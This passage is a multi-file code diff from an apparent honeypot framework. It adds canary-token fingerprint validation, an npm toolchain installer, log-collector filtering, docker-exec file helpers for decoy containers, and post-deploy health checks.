                decky_name, repo,
                persona="linux", created_by=created_by, bus=bus,
                container=target,
            )
            for row in rows:
                row["decky_name"] = decky_name
            planted.extend(rows)
    return planted

View File

@@ -26,9 +26,14 @@ crashes loudly rather than masking failures.
from __future__ import annotations
import asyncio
import base64
import binascii
import json
import os
import time
import uuid
from datetime import datetime, timezone
from typing import Optional
from typing import Any, Optional
from fastapi import FastAPI, Request, Response
@@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex(
)
# Namespace used by fingerprint generators to derive mint UUID.
# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
# Maps (token_uuid, src_ip) -> list of monotonic timestamps.
# Not shared across worker restarts or processes — acceptable for MVP.
_FP_RATE_WINDOW_S = 60
_FP_RATE_LIMIT = 30
_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
key = (token_uuid, src_ip)
now = time.monotonic()
cutoff = now - _FP_RATE_WINDOW_S
bucket = _fp_rate_buckets.get(key, [])
bucket = [t for t in bucket if t > cutoff]
if len(bucket) >= _FP_RATE_LIMIT:
_fp_rate_buckets[key] = bucket
return False
bucket.append(now)
_fp_rate_buckets[key] = bucket
return True
def _is_valid_fp_shape(fp: dict) -> bool:
"""Layer B — structural sanity check on a decoded fingerprint blob."""
if not isinstance(fp.get("mint"), str) or not fp["mint"]:
return False
known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
return present >= 3
def _http_base() -> str:
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
@@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
@app.get("/c/{slug}")
async def callback(slug: str, request: Request) -> Response:
raw_nonce = request.query_params.get("k")
fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
merged_headers = dict(request.headers)
if fp_meta:
merged_headers.update(fp_meta)
await _record_hit(
repo, bus,
slug=slug,
@@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
user_agent=request.headers.get("user-agent"),
request_path=str(request.url.path),
dns_qname=None,
raw_headers=dict(request.headers),
raw_headers=merged_headers,
parsed_fp=parsed_fp,
raw_nonce=raw_nonce,
)
# Always 200 with a tiny image so the attacker's client sees
# a "success" — same return regardless of whether the slug is
@@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
return app
# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest
# overflow is handled via chunking (s/i/n + d). Anything larger than
# this on a single request is junk, so we drop it instead of letting an
# attacker inflate a trigger row indefinitely.
_FP_CHUNK_MAX = 8 * 1024
def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
"""Decode fingerprint-payload query params into (meta_dict, parsed_fp).
The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
* ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
* ``?d=<b64url-json>`` — single-shot fingerprint dump.
* ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
Returns a tuple of:
- ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
- ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
when there's no ``?d=`` or decoding fails.
"""
out: dict[str, Any] = {}
parsed_fp: Optional[dict] = None
if not qp:
return out, parsed_fp
o = qp.get("o") if hasattr(qp, "get") else None
if o:
out["_fp_open"] = "1"
d = qp.get("d") if hasattr(qp, "get") else None
if not d:
return out, parsed_fp
if len(d) > _FP_CHUNK_MAX:
out["_fp_oversize"] = "1"
return out, parsed_fp
sid = qp.get("s")
idx = qp.get("i")
total = qp.get("n")
if sid and idx and total:
out["_fp_sid"] = sid
out["_fp_idx"] = idx
out["_fp_total"] = total
out["_fp_chunk"] = d
return out, parsed_fp
# Single-shot: decode and pass back as parsed_fp; validation runs in
# _record_hit after token lookup so we have the stored nonce at hand.
try:
padded = d + "=" * (-len(d) % 4)
raw = base64.urlsafe_b64decode(padded.encode("ascii"))
parsed = json.loads(raw.decode("utf-8"))
except (binascii.Error, ValueError, UnicodeDecodeError):
out["_fp_decode_error"] = "1"
return out, parsed_fp
if isinstance(parsed, dict):
parsed_fp = parsed
else:
out["_fp_decode_error"] = "1"
return out, parsed_fp
def _client_ip(request: Request) -> str:
# Honor X-Forwarded-For if the operator deployed behind a reverse
# proxy. Take the leftmost address in the chain; everything after
@@ -154,16 +262,58 @@ async def _record_hit(
request_path: Optional[str],
dns_qname: Optional[str],
raw_headers: Optional[dict],
parsed_fp: Optional[dict] = None,
raw_nonce: Optional[str] = None,
) -> None:
"""Resolve slug -> token, persist a trigger, publish on the bus.
Unknown slugs are silently swallowed: returning the same response
for known and unknown slugs is the stealth posture, and persisting
every random scan would clutter the DB.
When *parsed_fp* is present (single-shot fingerprint decode succeeded),
it is validated through four layers before being merged into raw_headers:
A) nonce match against CanaryToken.fingerprint_nonce,
B) structural shape check,
C) mint UUID consistency,
D) per-(token, IP) rate limit.
Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
The trigger row always lands regardless — the GET hit is itself forensic.
"""
token = await repo.get_canary_token_by_slug(slug)
if token is None:
return
final_headers: dict[str, Any] = dict(raw_headers or {})
if parsed_fp is not None:
stored_nonce: Optional[str] = token.get("fingerprint_nonce")
# Layer A — nonce
if stored_nonce is not None and raw_nonce != stored_nonce:
final_headers["_fp_invalid_nonce"] = "1"
parsed_fp = None
# Layer B — shape (only when nonce passed or no nonce enforced)
if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
final_headers["_fp_invalid_shape"] = "1"
parsed_fp = None
# Layer C — mint UUID consistency
if parsed_fp is not None:
expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
if parsed_fp.get("mint") != expected_mint:
final_headers["_fp_invalid_mint"] = "1"
parsed_fp = None
# Layer D — rate limit
if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
final_headers["_fp_rate_limited"] = "1"
parsed_fp = None
if parsed_fp is not None:
final_headers["_fp"] = parsed_fp
trigger_id = await repo.record_canary_trigger({
"token_uuid": token["uuid"],
"occurred_at": datetime.now(timezone.utc),
@@ -171,7 +321,7 @@ async def _record_hit(
"user_agent": user_agent,
"request_path": request_path,
"dns_qname": dns_qname,
"raw_headers": raw_headers or {},
"raw_headers": final_headers,
})
try:
await bus.publish(
@@ -189,6 +339,22 @@ async def _record_hit(
except Exception as e: # noqa: BLE001 — best effort
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
# Auto-deregister fingerprint canaries after the first valid fingerprint
# is collected. Slug goes dark; the stealth posture means the attacker
# sees the same 200 + GIF on the next hit — nothing reveals the revocation.
# Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
# http/dns canaries are NOT auto-revoked.
if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
try:
await repo.update_canary_token_state(token["uuid"], "revoked")
await bus.publish(
topics.canary(token["uuid"], topics.CANARY_REVOKED),
{"token_id": token["uuid"], "trigger_id": trigger_id,
"reason": "fingerprint_collected"},
)
except Exception as e: # noqa: BLE001 — trigger row already landed; best effort
log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
# ---------------------------- DNS surface --------------------------------

View File

@@ -1,8 +1,13 @@
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
``@app.command(name="canary")`` Typer entry point that delegates to
:func:`decnet.canary.worker.run`.
Two entry points share this module:
* ``decnet canary`` — runs the worker process. Mirrors the shape of
:mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
systemd unit so its argv must stay stable.
* ``decnet canary-install-toolchain`` — provisions the Node side of
the fingerprint-canary obfuscator. Idempotent; safe to call from
the API service unit's ``ExecStartPre``.
Not master-only — any host that hosts deckies can run its own
canary worker (the bus events stay local; the webhook worker on
@@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
"""
from __future__ import annotations
import shutil
import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer
from pathlib import Path
import typer
from . import utils as _utils
from .utils import console, log
_TOOLCHAIN_TIMEOUT_S = 180
def register(app: typer.Typer) -> None:
@app.command(name="canary")
@@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None:
asyncio.run(run())
except KeyboardInterrupt:
console.print("\n[yellow]Canary worker stopped.[/]")
@app.command(name="canary-install-toolchain")
def canary_install_toolchain(
npm_bin: str = typer.Option(
"npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
),
) -> None:
"""Install the Node-side toolchain used by fingerprint canaries.
Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
directory so the obfuscator's helper script can ``require()``
``javascript-obfuscator`` at mint time. Requires Node >= 18.
Idempotent: re-running on an already-installed tree is fast
(npm short-circuits when ``node_modules/`` is up-to-date).
"""
import decnet.canary as _canary_pkg
canary_dir = Path(_canary_pkg.__file__).resolve().parent
if not (canary_dir / "package.json").is_file():
console.print(
f"[red]canary package.json not found under {canary_dir}; "
"wheel may be missing the JS toolchain payload.[/]"
)
raise typer.Exit(code=2)
if shutil.which(npm_bin) is None:
console.print(
f"[red]npm executable {npm_bin!r} not found on PATH. "
"Install Node >= 18 and re-run.[/]"
)
raise typer.Exit(code=2)
console.print(
f"[cyan]installing canary toolchain[/] in {canary_dir}",
)
try:
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
[npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
cwd=str(canary_dir),
capture_output=True, text=True,
timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
)
except subprocess.TimeoutExpired:
console.print("[red]npm install timed out after 3 minutes[/]")
raise typer.Exit(code=3) from None
if proc.returncode != 0:
console.print(
f"[red]npm install failed rc={proc.returncode}[/]\n"
f"{proc.stderr.strip()}"
)
raise typer.Exit(code=proc.returncode)
console.print("[green]canary toolchain ready[/]")

View File

@@ -74,6 +74,7 @@ _CONFIG_PLACEHOLDER = """\
# master-host = 10.0.0.1
# syslog-port = 6514
# swarmctl-port = 8770
# swarmctl-host = 127.0.0.1
# [logging]
# system-log = /var/log/decnet/decnet.system.log

View File

@@ -16,8 +16,16 @@ from .utils import console, log
def register(app: typer.Typer) -> None:
@app.command()
def swarmctl(
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
port: int = typer.Option(
8770, "--port",
envvar="DECNET_SWARMCTL_PORT",
help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
),
host: str = typer.Option(
"127.0.0.1", "--host",
envvar="DECNET_SWARMCTL_HOST",
help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
),
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),

View File

@@ -233,8 +233,8 @@ def _delete(
topo = await repo.get_topology(topology_id)
if topo is None:
return False, "not-found"
if topo["status"] in _RUNNING:
return False, str(topo["status"])
if topo.status in _RUNNING:
return False, str(topo.status)
ok = await repo.delete_topology_cascade(topology_id)
return ok, None

View File

@@ -342,7 +342,7 @@ def combined_campaign_weight(
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def]
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
Treats one ``SyntheticAttacker`` as one identity — adequate for

View File

@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def]
def from_synthetic(att) -> Observation:
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
Lives here so test code doesn't import the factory shape into the

View File

@@ -75,6 +75,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
)
_RL_MAX_ENTRIES: int = 10_000
# APP-NAMEs we never want to see in the ingestion stream — native unix
# daemons that share a container with a DECNET service. Their logs are
# noise: sshd's "Failed password for root from X" duplicates the
# auth-helper's structured `auth_attempt` event, pam_unix repeats it
# again, and CRON/systemd/etc. say nothing about attacker behavior.
# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
_DROP_APPS: frozenset[str] = frozenset(
a.strip()
for a in os.environ.get(
"DECNET_COLLECTOR_DROP_APPS",
"sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
).split(",")
if a.strip()
)
_rl_lock: threading.Lock = threading.Lock()
_rl_last: dict[tuple[str, str, str, str], float] = {}
@@ -82,10 +97,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
def _should_ingest(parsed: dict[str, Any]) -> bool:
"""
Return True if this parsed event should be written to the JSON ingestion
stream. Rate-limited connection-lifecycle events return False when another
event with the same (attacker_ip, decky, service, event_type) was emitted
inside the dedup window.
stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
rate-limits connection-lifecycle events within a dedup window.
"""
if parsed.get("service", "") in _DROP_APPS:
return False
event_type = parsed.get("event_type", "")
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
return True
@@ -220,6 +236,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
except ValueError:
ts_formatted = ts_raw
# Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
# "CMD ") get event_type rewritten to "command". `fields` stays empty
# so the frontend's msg-based pill rendering doesn't double up.
if event_type == "-" and msg.startswith("CMD "):
event_type = "command"
return {
"timestamp": ts_formatted,
"decky": decky,

View File

@@ -39,6 +39,7 @@ Shape::
master-host = 10.0.0.1 # required on agents
syslog-port = 6514
swarmctl-port = 8770
swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl`
[logging]
system-log = /var/log/decnet/decnet.system.log
@@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
"master-host": "DECNET_SWARM_MASTER_HOST",
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
"swarmctl-port": "DECNET_SWARMCTL_PORT",
"swarmctl-host": "DECNET_SWARMCTL_HOST",
},
"logging": {
"system-log": "DECNET_SYSTEM_LOGS",

View File

@@ -137,6 +137,19 @@ def parse_line(line: str) -> LogEvent | None:
msg = tail.group(1).strip() if tail else ""
attacker_ip = _extract_attacker_ip(fields, msg)
# Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
# and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
# Without this rewrite they're invisible to the behavioral profiler, which
# filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
# invocation uses --msgid command, so we must also handle the non-nil case.
if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
event_type = "command"
head, sep, cmd_rest = msg[4:].partition("cmd=")
for k, v in re.findall(r'(\w+)=(\S+)', head):
fields.setdefault(k, v)
if sep:
fields.setdefault("command", cmd_rest)
# Mutator-emitted transitions arrive on the same ingest stream but
# belong in the substrate-state index, not the per-IP attacker one.
kind: EventKind = (

View File

@@ -70,7 +70,7 @@ async def run_reuse_loop(
wake_tasks.append(asyncio.create_task(
_run_control_listener_signal(bus, "reuse-correlator"),
))
except Exception as exc: # noqa: BLE001
except Exception as exc:
log.warning(
"reuse correlator: bus unavailable, running in poll-only mode: %s",
exc,
@@ -86,7 +86,7 @@ async def run_reuse_loop(
results = await engine.correlate_credential_reuse(
repo, min_targets=min_targets,
)
except Exception: # noqa: BLE001
except Exception:
log.exception("reuse correlator: tick failed")
results = []
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
wake.set()
except asyncio.CancelledError:
raise
except Exception as exc: # noqa: BLE001
except Exception as exc:
log.warning(
"reuse correlator: subscriber for %s died (%s); falling back to poll",
pattern, exc,

View File

@@ -0,0 +1,39 @@
"""Shared primitives for writing/deleting files inside running deckies.
The canary planter and the orchestrator SSH driver both need to drop
bytes into a decky container's filesystem, then sometimes unlink them.
The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
before this module existed.
Public API:
* :func:`write_file_to_container` — write bytes at a path, set mode,
optionally backdate mtime.
* :func:`delete_file_from_container` — best-effort ``rm -f``.
* :func:`resolve_topology_container` — pick the right docker container
for a MazeNET decky based on its services list.
* :func:`resolve_decky_container` — async helper that takes
``(decky_name, topology_id?)``, hydrates the topology when needed,
and returns the docker container name.
Container resolution conventions are documented in
:mod:`decnet.topology.compose`; we mirror them here without taking
a runtime dependency on the compose generator.
"""
from __future__ import annotations
from .resolve import (
resolve_decky_container,
resolve_topology_container,
)
from .write import (
delete_file_from_container,
write_file_to_container,
)
__all__ = [
"delete_file_from_container",
"resolve_decky_container",
"resolve_topology_container",
"write_file_to_container",
]

View File

@@ -0,0 +1,72 @@
"""Decky-name → docker container name resolution.
Two scopes:
* **Fleet**: every fleet decky has a ``ssh`` service container named
``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`). We always
target it because it carries the most realistic filesystem layout.
* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
decky exposes the ssh service; otherwise the decky's base container
named ``decnet_t_<topology_id8>_<decky_name>`` (matches
:func:`decnet.topology.compose._container_name`).
Keeping resolution centralised here means new ``docker exec`` callers
(file drops, future bulk planters, etc.) never need to learn the
naming conventions — they just call :func:`resolve_decky_container`.
"""
from __future__ import annotations
from typing import Any, Iterable, Optional
_SSH_CONTAINER_SUFFIX = "-ssh"


def resolve_topology_container(
    topology_id: str, decky_name: str, services: Iterable[str],
) -> str:
    """Return the docker container name for a MazeNET (topology) decky.

    A decky whose *services* include ``"ssh"`` is addressed through its
    ``<decky_name>-ssh`` service container. Any other decky falls back to
    its base container, named
    ``decnet_t_<first 8 chars of topology_id>_<decky_name>``.

    Pure function: it only inspects its arguments and performs no I/O.
    """
    exposed = frozenset(services)
    if "ssh" not in exposed:
        return f"decnet_t_{topology_id[:8]}_{decky_name}"
    return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
async def resolve_decky_container(
    repo: Any,
    decky_name: str,
    *,
    topology_id: Optional[str] = None,
) -> str:
    """Map *decky_name* to the docker container that should be exec'd into.

    Fleet scope (``topology_id`` is ``None``): the answer is always
    ``<decky_name>-ssh``. Nothing is looked up, so existence of the decky
    is not checked here.

    Topology scope: the topology is hydrated through *repo*, the entry
    whose name equals *decky_name* is located, and its ``services`` list
    is handed to :func:`resolve_topology_container`.

    Raises:
        LookupError: ``topology_id`` was given but either the topology
            could not be hydrated or it contains no decky with that name.
    """
    if topology_id is None:
        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"

    # Imported lazily, only on the topology path.
    from decnet.topology.persistence import hydrate

    snapshot = await hydrate(repo, topology_id)
    if snapshot is None:
        raise LookupError(f"topology {topology_id!r} not found")

    def _entry_name(entry: Any) -> Any:
        # Prefer the name stored inside decky_config, then the row's own.
        return (entry.get("decky_config") or {}).get("name") or entry.get("name")

    found = next(
        (entry for entry in snapshot["deckies"] if _entry_name(entry) == decky_name),
        None,
    )
    if found is None:
        raise LookupError(
            f"decky {decky_name!r} is not in topology {topology_id!r}"
        )
    return resolve_topology_container(
        topology_id, decky_name, found.get("services") or [],
    )

124
decnet/decky_io/write.py Normal file
View File

@@ -0,0 +1,124 @@
"""``docker exec``-driven file write/delete inside a decky container.
The write path streams a base64-encoded payload over stdin to
``base64 -d`` inside the container, so binary content of any size up
to docker's stream limits is safe — interpolating bytes into argv
would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
"""
from __future__ import annotations
import asyncio
import base64
import shlex
from datetime import datetime, timezone
from typing import Optional
from decnet.logging import get_logger
log = get_logger("decky_io.write")
_DOCKER = "docker"
_DEFAULT_TIMEOUT = 8.0
def _dirname(path: str) -> str:
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]
async def _run(
    argv: list[str],
    *,
    stdin_bytes: Optional[bytes] = None,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[int, str, str]:
    """Run *argv* as a subprocess and return ``(returncode, stdout, stderr)``.

    Args:
        argv: Command and arguments, executed without a shell.
        stdin_bytes: Bytes to feed to the child's stdin. When ``None`` no
            stdin pipe is opened.
        timeout: Seconds to wait for the child to finish.

    Returns:
        A ``(rc, stdout, stderr)`` tuple. Output is decoded as UTF-8 with
        undecodable bytes replaced. Failures use synthetic return codes:
        ``127`` when the executable is not found, ``124`` (stderr
        ``"timeout"``) when the deadline expires, and ``-1`` if the
        process reports no return code.
    """
    try:
        proc = await asyncio.create_subprocess_exec(
            *argv,
            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
    except FileNotFoundError as exc:
        return 127, "", f"argv[0] not found: {exc}"
    try:
        stdout, stderr = await asyncio.wait_for(
            proc.communicate(input=stdin_bytes), timeout=timeout,
        )
    except asyncio.TimeoutError:
        try:
            proc.kill()
        except ProcessLookupError:
            # The child exited between the timeout firing and the kill.
            pass
        # Reap the child so it does not linger as a zombie and its pipe
        # transports are released. kill() only sends the signal.
        await proc.wait()
        return 124, "", "timeout"
    return (
        proc.returncode if proc.returncode is not None else -1,
        stdout.decode("utf-8", "replace"),
        stderr.decode("utf-8", "replace"),
    )
async def write_file_to_container(
    container: str,
    path: str,
    content: bytes,
    *,
    mode: int = 0o644,
    mtime: Optional[datetime] = None,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
    """Place *content* at *path* inside *container* using ``docker exec``.

    The payload is base64-encoded and streamed over stdin to ``base64 -d``
    in the container. The shell pipeline first runs ``mkdir -p`` on the
    parent directory, then writes the file, then applies *mode* with
    ``chmod``. If *mtime* is given, the file is finally backdated with
    ``touch -d`` using that instant converted to UTC.

    Returns:
        ``(True, None)`` on success. Otherwise ``(False, error)``, where
        ``error`` is the stripped stderr truncated to 256 characters, or
        ``"rc=<n>"`` when stderr is empty. An empty *path* short-circuits
        with ``(False, "empty path")``.
    """
    if not path:
        return False, "empty path"

    quoted_path = shlex.quote(path)
    steps = [
        f"mkdir -p {shlex.quote(_dirname(path))}",
        f"base64 -d > {quoted_path}",
        f"chmod {mode:o} {quoted_path}",
    ]
    if mtime is not None:
        stamp = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        steps.append(f"touch -d {shlex.quote(stamp)} {quoted_path}")

    # "-i" keeps stdin attached so the encoded payload reaches base64.
    argv = [_DOCKER, "exec", "-i", container, "sh", "-c", " && ".join(steps)]
    rc, _out, stderr = await _run(
        argv, stdin_bytes=base64.b64encode(content), timeout=timeout,
    )
    if rc != 0:
        log.warning(
            "decky_io.write failed container=%s path=%s rc=%d stderr=%r",
            container, path, rc, stderr[:120],
        )
        return False, stderr.strip()[:256] or f"rc={rc}"
    return True, None
async def delete_file_from_container(
    container: str,
    path: str,
    *,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
    """Run ``rm -f`` on *path* inside *container* (best effort).

    Returns:
        ``(True, None)`` when the command exits 0. Because ``rm -f`` also
        exits 0 for a file that is already gone, success means the file is
        absent afterwards, not that this call removed it. On a non-zero
        exit the result is ``(False, error)``, with ``error`` being the
        stripped stderr (at most 256 characters) or ``"rc=<n>"``.
    """
    argv = [_DOCKER, "exec", container, "sh", "-c", f"rm -f {shlex.quote(path)}"]
    rc, _out, stderr = await _run(argv, timeout=timeout)
    if rc != 0:
        return False, stderr.strip()[:256] or f"rc={rc}"
    return True, None

View File

@@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
"""
import asyncio
import json
import shutil
import subprocess # nosec B404
import time
@@ -163,6 +164,48 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
shutil.copy2(src, dest)
def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
"""Return ``docker compose ps`` rows for *compose_file* as parsed JSON.
Used for post-deploy verification: ``compose up -d`` returns 0 the
moment containers are *started*, but a service that crashes on boot
(port collision, bad image, missing dependency) only shows up here.
Returns an empty list when compose has nothing to report (and on
parse failure — caller treats that as 'unverifiable, don't gate').
"""
cmd = [
"docker", "compose", "-p", "decnet", "-f", str(compose_file),
"ps", "--all", "--format", "json",
]
try:
result = subprocess.run( # nosec B603
cmd, capture_output=True, text=True, check=False,
)
except FileNotFoundError:
return []
if result.returncode != 0:
return []
rows: list[dict[str, object]] = []
# ``docker compose ps --format json`` emits one JSON object per line
# (newline-delimited), not a JSON array. Parse line-by-line so a
# single bad line doesn't poison the whole result.
for line in (result.stdout or "").splitlines():
line = line.strip()
if not line:
continue
try:
obj = json.loads(line)
except json.JSONDecodeError:
continue
if isinstance(obj, dict):
rows.append(obj)
elif isinstance(obj, list):
for item in obj:
if isinstance(item, dict):
rows.append(item)
return rows
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
import os
# -p decnet pins the compose project name. Without it, docker compose
@@ -953,8 +996,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
)
raise
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
# Post-deploy verification: ``compose up -d`` returns 0 the moment
# containers are *started*, so a service that crashes on boot
# (port bind failure, bad image, missing dependency) leaves the
# topology row sitting at ACTIVE while half the substrate is dead.
# Sample compose ps once and downgrade to DEGRADED if any expected
# container isn't running — operators see real state instead of an
# optimistic flag.
ps_rows = await anyio.to_thread.run_sync(
lambda: _compose_ps(compose_path),
)
bad: list[str] = []
# Build the per-decky state map. The base container's compose
# service name == decky name, which is what we cache on the
# TopologyDecky row. Service containers (named ``<decky>-<svc>``)
# don't gate the decky's state — service-level failures are visible
# in compose ps separately and don't downgrade the decky as a whole.
decky_state_by_name: dict[str, str] = {}
for row in ps_rows:
state = str(row.get("State", "")).lower()
service_name = str(row.get("Service") or "")
if service_name and "-" not in service_name:
# Plain decky base; cache its docker state.
decky_state_by_name[service_name] = state or "unknown"
if state and state != "running":
name = str(row.get("Name") or row.get("Service") or "?")
exit_code = row.get("ExitCode")
bad.append(
f"{name}={state}"
+ (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
)
# Reconcile each TopologyDecky.state from compose's view. Without
# this, the row stays at the default 'pending' forever and the
# dashboard's ACTIVE DECKIES count reads 0/N even when everything's
# actually up.
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
decky_name = cfg.get("name") or decky.get("name")
if not decky_name:
continue
ds = decky_state_by_name.get(decky_name, "unknown")
new_state = "running" if ds == "running" else "failed"
try:
await repo.update_topology_decky(
decky["uuid"], {"state": new_state},
)
except Exception as exc: # noqa: BLE001
log.warning(
"post-deploy state reconcile failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
if bad:
reason = "post-deploy check: " + ", ".join(bad[:8]) + (
f" and {len(bad) - 8} more" if len(bad) > 8 else ""
)
await transition_status(
repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
)
log.warning(
"topology %s deployed but %d container(s) unhealthy: %s",
topology_id, len(bad), reason,
)
else:
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
# Best-effort canary baseline seed across every decky in the
# topology. Same resilience contract as the fleet path: failures
# surface as state=failed token rows, never abort the deploy.
try:
from decnet.canary import planter as _canary_planter
await _canary_planter.seed_baseline_topology(repo, topology_id)
except Exception as exc: # noqa: BLE001
log.warning(
"canary baseline seed failed (best-effort) topology=%s err=%s",
topology_id, exc,
)
@_traced("engine.teardown_topology")

View File

@@ -0,0 +1,673 @@
"""Add/remove a single service on a deployed decky without full redeploy.
The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
supports per-service targeting (``up --no-deps -d <svc>``,
``stop <svc>``, ``rm -f <svc>``). What was missing was the
orchestration: regenerate the compose file (so future redeploys reflect
the change), persist the new ``services`` list, and run the targeted
compose command.
Two scopes:
* **Topology** — source of truth is the ``topology_deckies`` table; the
compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
* **Fleet** — source of truth is ``decnet-state.json`` (with the
``fleet_deckies`` table mirroring it); compose is the unihost
``decnet-compose.yml``.
Both publish ``decky.<name>.service.added`` /
``decky.<name>.service.removed`` on the bus. The new topic constants
are documented in ``wiki-checkout/Service-Bus.md``.
"""
from __future__ import annotations
import subprocess # nosec B404
from pathlib import Path
from typing import Any, Literal, Optional
import anyio
from decnet.bus import topics
from decnet.logging import get_logger
from decnet.services.base import BaseService
from decnet.services.registry import get_service
from decnet.topology.persistence import hydrate
from decnet.web.db.repository import BaseRepository
# Heavy imports (composer/deployer pull in decnet.network → docker) are
# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
# / ``_load_state`` indirection helpers below. Mirrors the lazy-import
# pattern in decnet.canary.planter for the same reason.
def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
